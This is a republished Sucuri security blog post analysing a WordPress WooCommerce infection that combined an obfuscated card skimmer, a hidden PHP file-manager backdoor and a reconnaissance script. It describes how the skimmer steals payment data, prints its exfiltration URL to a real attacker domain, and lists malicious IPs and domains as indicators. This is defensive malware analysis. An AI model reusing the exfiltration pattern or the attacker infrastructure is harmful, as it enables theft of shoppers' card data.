(520) 462-0516

info@threatintel-solutions.net

Threat Intel Solutions

Let’s Talk

Credit Card Skimmer and Backdoor on WordPress E-commerce Site

* [Ecommerce Security](https://blog.sucuri.net/category/ecommerce-security)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)Credit Card Skimmer and Backdoor on WordPress E-commerce Site=============================================================![](https://secure.gravatar.com/avatar/846b8deebaa5f89a647dfbee5ef32a5e?s=60&d=mm&r=g) [Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava)* March 14, 2025 ![Credit Card Skimmer and Backdoor on WordPress E-commerce Site](https://blog.sucuri.net/wp-content/uploads/2025/03/Credit-Card-Skimmer-and-Backdoor-on-WordPress-E-commerce-Site-820×385.png) The battle against e-commerce malware continues to intensify, with attackers deploying increasingly sophisticated tactics. In a recent case at Sucuri, a customer reported suspicious files and unexpected behavior on their WordPress site. Upon deeper analysis, we discovered a complicated infection involving multiple components: a credit card skimmer, a hidden backdoor file manager, and a malicious script all working together as part of a coordinated attack.What Did We See?—————-The customer initially contacted us after noticing unknown files on their server and experiencing intermittent issues with their checkout process. Customers had also reported unusual activity on their credit cards shortly after making purchases on the site.Our investigation revealed a malware attack specifically designed for WordPress WooCommerce websites, indicating a focus on e-commerce platforms. The combination of credit card skimming and remote file management suggests a multifaceted attack aimed at both financial gain and long-term control.The infection involved three distinct malicious components affecting multiple areas within the WordPress installation:* A heavily obfuscated JavaScript credit card skimmer injected into the checkout page.* A hidden PHP file manager backdoor disguised as a WordPress core file.* A information-gathering reconnaissance script placed in a location typically used for WordPress core files, designed to verify the infection status and gather server information.Analysis of the Credit Card Skimmer———————————–### Code 1: PHP based File ManagerOne of the most dangerous files we found was a PHP shell, which might have allowed attackers to run system commands remotely. This type of malware is often used to upload additional payloads, modify files, and execute arbitrary commands.![PHP shell](https://blog.sucuri.net/wp-content/uploads/2025/03/php-shell.png)This [backdoor](https://blog.sucuri.net/2025/01/backdoors-the-hidden-threat-lurking-in-your-website.html) implements several features:* **Cookie-based authentication:** The file manager is hidden by default and only appears when a specific cookie is present* **Complete filesystem access:** Functions to list, create, edit, delete, and upload files* **Directory traversal:** Ability to navigate throughout the server’s filesystem* **Timestamp manipulation:** The ‘touch’ feature allows attackers to modify file timestamps to hide their activities.### Code 2: Credit Card SkimmerThe payload was a JavaScript skimmer designed to steal customer payment information during checkout. The code was heavily obfuscated to avoid detection:![credit card skimmer](https://blog.sucuri.net/wp-content/uploads/2025/03/credit-card-skimmer.png)After deobfuscation, we determined the script’s functionality:* **Anti-debugging measures:**The script includes code to detect if developer tools are open, preventing analysis* **Event listener on checkout page:** Only activates on the checkout page* **Form field monitoring:** Collects data from CyberSource payment fields and billing information* **Data exfiltration:** Encodes the stolen data and sends it to the attacker’s server using a fake image requestThe most revealing part of the code is the data exfiltration mechanism:![data exfiltration mechanism](https://blog.sucuri.net/wp-content/uploads/2025/03/data-exfiltration-mechanism.png)This script waits for user clicks on the checkout page, collects the credit card number, expiration date, security code, and all billing information, then encodes it and sends it to **imageresizefix** -[**.** -]**com** disguised as an image request.“`https://imageresizefix[.]com/pixel_info/img-sort.php?validator=ENCODED_DATA“`### Code 3: API-Driven SurveillanceThe third component was a reconnaissance script designed to verify the infection and gather information about the WordPress installation:![API-driven surveillance](https://blog.sucuri.net/wp-content/uploads/2025/03/api-driven-surveillance.png)This script checked for the existence of an admin user ID and searched for specific strings within files. This allowed the attackers to monitor their presence and the site’s status.### Indicators of Compromise (IOCs)We found that the malware was communicating with the following:* **Malicious IP:** `104.194.151.47` and `185.247.224.241`* **Malicious Domains:**imageresizefix-[.-]com and imageinthebox-[.-]comThese have now been blocklisted by Sucuri to prevent further infections.Motive Behind the Attack————————The advanced nature of this attack indicates a financially-motivated cybercriminal group specifically targeting e-commerce sites. Their objectives were likely:* **Financial Gain:** The primary goal was to harvest credit card data for financial fraud or sale on dark web marketplaces* **Persistent Access:** The backdoor allowed long-term access to the server for ongoing exploitation* **Platform for Further Attacks:** The compromised server could be used to host malware or attack other sitesImpact of the Malware———————The impact of this malware could be severe:* **Financial Loss:** Stolen credit card data could lead to significant financial losses for both the business and its customers.* **Reputational Damage:** A data breach can severely damage a business’s reputation and customer trust.* **Potential PCI Compliance Violations:** The breach may have violated payment card industry standards.* **Loss of Control:** The remote file manager allowed attackers to manipulate the site, potentially disrupting operations or causing data loss.* **SEO Damage:** Malware can inject spam links and content, harming the site’s search engine rankings.Mitigation and Prevention————————-* **Immediate Malware Removal:**Conduct a thorough scan and removal of all malicious code.* **Password Resets:** Reset all passwords for administrative accounts and database access.* **File Integrity Monitoring:**Implement file integrity monitoring to detect unauthorized file modifications.* **Web Application Firewall (WAF):** Deploy a WAF to block malicious requests and prevent future attacks.* **Regular Security Audits:** Conduct regular security audits to identify and address vulnerabilities.* **Plugin and Theme Updates:** Keep all plugins and themes up to date.* **Payment Gateway Security:** Ensure the payment gateway is configured securely and kept up to date.* **Blocklisting:** The IP and domain mentioned above are now blocklisted by Sucuri.* **Two-Factor Authentication (2FA):** Enforce 2FA for all administrative accounts.* **Least Privilege Principle:** Limit user permissions to only what is necessary.Conclusion———-This case demonstrates the evolving complexity of attacks targeting e-commerce platforms. The combination of credit card skimming, backdoor access, and reconnaissance capabilities shows a well-organized operation focused on long-term exploitation.Site owners should implement strict security measures for their e-commerce platforms, particularly around payment processing. Regular security scans, proper access controls, and timely updates are essential to prevent these types of attacks.Sucuri has added detection signatures for this malware strain to our scanning and firewall products to protect our customers from similar attacks. For professional malware removal and security hardening, visit [Sucuri.net](https://sucuri.net/).![Chat with Sucuri](https://blog.sucuri.net/wp-content/uploads/2022/02/Sucuri_1390x466_Chat-With-Us_CTA-Image_v2-SMB_Victor.png) ![](https://secure.gravatar.com/avatar/846b8deebaa5f89a647dfbee5ef32a5e?s=120&d=mm&r=g) ##### [Puja Srivastava](https://blog.sucuri.net/author/puja-srivastava)Puja Srivastava is a Security Analyst with a passion for fighting new and undetected malware threats. With over 7 years of experience in the field of malware research and security, Puja has honed her skills in detecting, monitoring, and cleaning malware from websites. Her responsibilities include website malware remediation, training, cross-training and mentoring new recruits and analysts from other departments, and handling escalations. Outside of work, Puja enjoys exploring new places and cuisines, experimenting with new recipes in the kitchen, and playing chess.##### Related Tags* [Credit Card Stealers](https://blog.sucuri.net/tag/credit-card-stealers),* [Malware](https://blog.sucuri.net/tag/malware),* [Website Backdoor](https://blog.sucuri.net/tag/website-backdoor),* [WordPress Plugins and Themes](https://blog.sucuri.net/tag/wordpress-plugins-and-themes)##### Related Categories* [Ecommerce Security](https://blog.sucuri.net/category/ecommerce-security)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)![Magbo spam injection encoded with hex2bin](https://blog.sucuri.net/wp-content/uploads/2023/03/23-BlogPost_Feature-Image_1490x700_Magbo-Spam-Injection-Encoded-with-hex2bin1-390×183.jpg) * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2023/03/magbo-spam-injection-encoded-with-hex2bin.html) [Magbo Spam Injection Encoded with hex2bin](https://blog.sucuri.net/2023/03/magbo-spam-injection-encoded-with-hex2bin.html)—————————————————————————————————————————* ![](https://secure.gravatar.com/avatar/fcf2c7b3195ff9058d29af3b8a49fc43?s=20&d=mm&r=g)Ben Martin* March 3, 2023 We recently had a new client come to us with a rather peculiar issue on their WordPress website: They were receiving unwanted popup advertisements but… [Read the Post](https://blog.sucuri.net/2023/03/magbo-spam-injection-encoded-with-hex2bin.html) ![WordPress Websites Used to Distribute ClearFake Trojan Malware](https://blog.sucuri.net/wp-content/uploads/2024/08/Blog-Post-WordPress-Websites-Used-to-Distribute-ClearFake-Trojan-Malware-390×183.jpg) * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2024/08/wordpress-websites-used-to-distribute-clearfake-trojan-malware.html) [WordPress Websites Used to Distribute ClearFake Trojan Malware](https://blog.sucuri.net/2024/08/wordpress-websites-used-to-distribute-clearfake-trojan-malware.html)———————————————————————————————————————————————————————* ![](https://secure.gravatar.com/avatar/fcf2c7b3195ff9058d29af3b8a49fc43?s=20&d=mm&r=g)Ben Martin* August 22, 2024 Unfortunately, scams are all over the place, and anybody who has surfed the web should know this. We’ve all gotten phishing emails, or redirected to… [Read the Post](https://blog.sucuri.net/2024/08/wordpress-websites-used-to-distribute-clearfake-trojan-malware.html) ![Remote Code Execution Backdoor Uses Unicode Obfuscation and Non-Standard File Extensions](https://blog.sucuri.net/wp-content/uploads/2023/06/23-BlogPost_Feature-Image_1490x700_Unicode-Obfuscation-and-Fictitious-File-Extensions–390×183.jpg) * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2023/06/remote-code-execution-backdoor-uses-unicode-obfuscation-non-standard-file-extensions.html) [Remote Code Execution Backdoor Uses Unicode Obfuscation -& Non-Standard File Extensions](https://blog.sucuri.net/2023/06/remote-code-execution-backdoor-uses-unicode-obfuscation-non-standard-file-extensions.html)——————————————————————————————————————————————————————————————————————–* ![](https://secure.gravatar.com/avatar/fcf2c7b3195ff9058d29af3b8a49fc43?s=20&d=mm&r=g)Ben Martin* June 22, 2023 Readers of this blog will know that attackers are constantly finding new ways to hide their malware and avoid detection; after all, that’s what good… [Read the Post](https://blog.sucuri.net/2023/06/remote-code-execution-backdoor-uses-unicode-obfuscation-non-standard-file-extensions.html) ![Obfuscation through legitimate appearances.](https://blog.sucuri.net/wp-content/uploads/2018/03/03202018-obfuscation-through-legitimate-appearances_en-blog-390×183.jpg) * [Website Security](https://blog.sucuri.net/category/website-security)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2018/04/obfuscation-through-legitimate-appearances.html) [Obfuscation Through Legitimate Appearances](https://blog.sucuri.net/2018/04/obfuscation-through-legitimate-appearances.html)—————————————————————————————————————————–* ![](https://secure.gravatar.com/avatar/aae9e45052caab7d92b7a32b89a4ab22?s=20&d=mm&r=g)Peter Gramantik* April 4, 2018 Recently, I analyzed a malware sample provided by our analyst Edward C. Woelke and noticed that it had been placed in a core WordPress folder…. [Read the Post](https://blog.sucuri.net/2018/04/obfuscation-through-legitimate-appearances.html) ![Saskmade Redirects](https://blog.sucuri.net/wp-content/uploads/2018/10/10262018-saskmade-redirects_en-blog-390×183.png) * [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2018/10/saskmade-net-redirects.html) [Saskmade-[.-]net Redirects](https://blog.sucuri.net/2018/10/saskmade-net-redirects.html)—————————————————————————————–* ![](https://secure.gravatar.com/avatar/c9ef50b85bd345ea4e0d8da558816f3d?s=20&d=mm&r=g)Denis Sinegubko* October 26, 2018 Earlier this week, we published a blog post about an ongoing massive malware campaign describing multiple infection vectors that it uses. This same week, we… [Read the Post](https://blog.sucuri.net/2018/10/saskmade-net-redirects.html) ![Labs Note](https://blog.sucuri.net/wp-content/uploads/2020/07/sucuri-labs-og1-390×181.png) * [Sucuri Labs](https://blog.sucuri.net/category/sucuri-labs)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [Website Security](https://blog.sucuri.net/category/website-security)[](https://blog.sucuri.net/2018/08/obfuscated-javascript-crypto-miner.html) [Obfuscated JavaScript Crypto Miner](https://blog.sucuri.net/2018/08/obfuscated-javascript-crypto-miner.html)————————————————————————————————————-* ![](https://secure.gravatar.com/avatar/fc823a900baec1ccb99b3d59638fe398?s=20&d=mm&r=g)Samuel Odendaal* August 1, 2018 During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, Crypto Miners were ran on customers visiting the… [Read the Post](https://blog.sucuri.net/2018/08/obfuscated-javascript-crypto-miner.html) ![Labs Note](https://blog.sucuri.net/wp-content/uploads/2020/07/sucuri-labs-og1-390×181.png) * [Sucuri Labs](https://blog.sucuri.net/category/sucuri-labs)* [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2019/06/spam-injector-masquerading-as-google-analytics.html) [Spam Injector Masquerading as Google Analytics](https://blog.sucuri.net/2019/06/spam-injector-masquerading-as-google-analytics.html)————————————————————————————————————————————-* ![](https://secure.gravatar.com/avatar/?s=20&d=mm&r=g)Keith Petkus* June 21, 2019 The domain en-google-analytic-[.-]com, currently sinkholed by a security intelligence company, has been observed by our team to be part of a mass spam injection campaign…. [Read the Post](https://blog.sucuri.net/2019/06/spam-injector-masquerading-as-google-analytics.html) ![WordPress Vulnerability & Patch Roundup February 2023](https://blog.sucuri.net/wp-content/uploads/2023/02/23-BlogPost_Feature-Image_1490x700_February-Vulnerability-Round-Up-390×183.jpg) * [Security Advisory](https://blog.sucuri.net/category/security-advisory)* [Vulnerability Disclosure](https://blog.sucuri.net/category/vulnerability-disclosure)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2023/02/wordpress-vulnerability-patch-roundup-february-2023.html) [WordPress Vulnerability -& Patch Roundup February 2023](https://blog.sucuri.net/2023/02/wordpress-vulnerability-patch-roundup-february-2023.html)————————————————————————————————————————————————–* ![](https://secure.gravatar.com/avatar/814d8a855f60f285a7501fd7d0b13e17?s=20&d=mm&r=g)Cesar Anjos* February 27, 2023 Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes… [Read the Post](https://blog.sucuri.net/2023/02/wordpress-vulnerability-patch-roundup-february-2023.html) ![Fake UpdraftPlus WordPress Plugin](https://blog.sucuri.net/wp-content/uploads/2018/11/11122018-wordpress-gdpr-plugin-infection_en-blog-390×183.png) * [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-with-wp-gdpr-compliance-plugin-vulnerability.html) [Erealitatea-[.-]net Hack Corrupts Websites with WP GDPR Compliance Plugin Vulnerability](https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-with-wp-gdpr-compliance-plugin-vulnerability.html)——————————————————————————————————————————————————————————————————————-* ![](https://secure.gravatar.com/avatar/2cc3d9e604665f78d321d5fbf710eb35?s=20&d=mm&r=g)Pedro Peixoto* November 9, 2018 We have noticed a growing number of WordPress-based sites that have had their URL settings changed to hxxp://erealitatea-[.-]net. Further investigations show that the issue is… [Read the Post](https://blog.sucuri.net/2018/11/erealitatea-net-hack-corrupts-websites-with-wp-gdpr-compliance-plugin-vulnerability.html) ![](https://blog.sucuri.net/wp-content/uploads/2017/05/05092017-fake-wordpress-stealing-cookies-and-hijacking-sessions_blog-390×183.jpg) * [Website Malware Infections](https://blog.sucuri.net/category/website-malware-infections)* [WordPress Security](https://blog.sucuri.net/category/wordpress-security)[](https://blog.sucuri.net/2017/05/fake-wordprssapi-stealing-cookies-and-hijacking-sessions.html) [Fake WordPrssAPI Stealing Cookies and Hijacking Sessions](https://blog.sucuri.net/2017/05/fake-wordprssapi-stealing-cookies-and-hijacking-sessions.html)———————————————————————————————————————————————————* ![](https://secure.gravatar.com/avatar/814d8a855f60f285a7501fd7d0b13e17?s=20&d=mm&r=g)Cesar Anjos* May 9, 2017 Cookies are stored in the user’s browser to track behavior on a specific website. They also keep a user logged in during the active browsing… [Read the Post](https://blog.sucuri.net/2017/05/fake-wordprssapi-stealing-cookies-and-hijacking-sessions.html)

Related Tags:
NAICS: 541 – Professional

Scientific

Technical Services

NAICS: 52 – Finance And Insurance

NAICS: 339 – Miscellaneous Manufacturing

NAICS: 33 – Manufacturing – Metal

Electronics And Other

NAICS: 522 – Credit Intermediation And Related Activities

Denis

TA0010 – Exfiltration

TA0043 – Reconnaissance

Blog: Sucuri

Associated Indicators:
imageinthebox.com

185.247.224.241

imageresizefix.com

104.194.151.47

Search

Popular Posts

Categories

Pages

Archives

Tags

Follow Us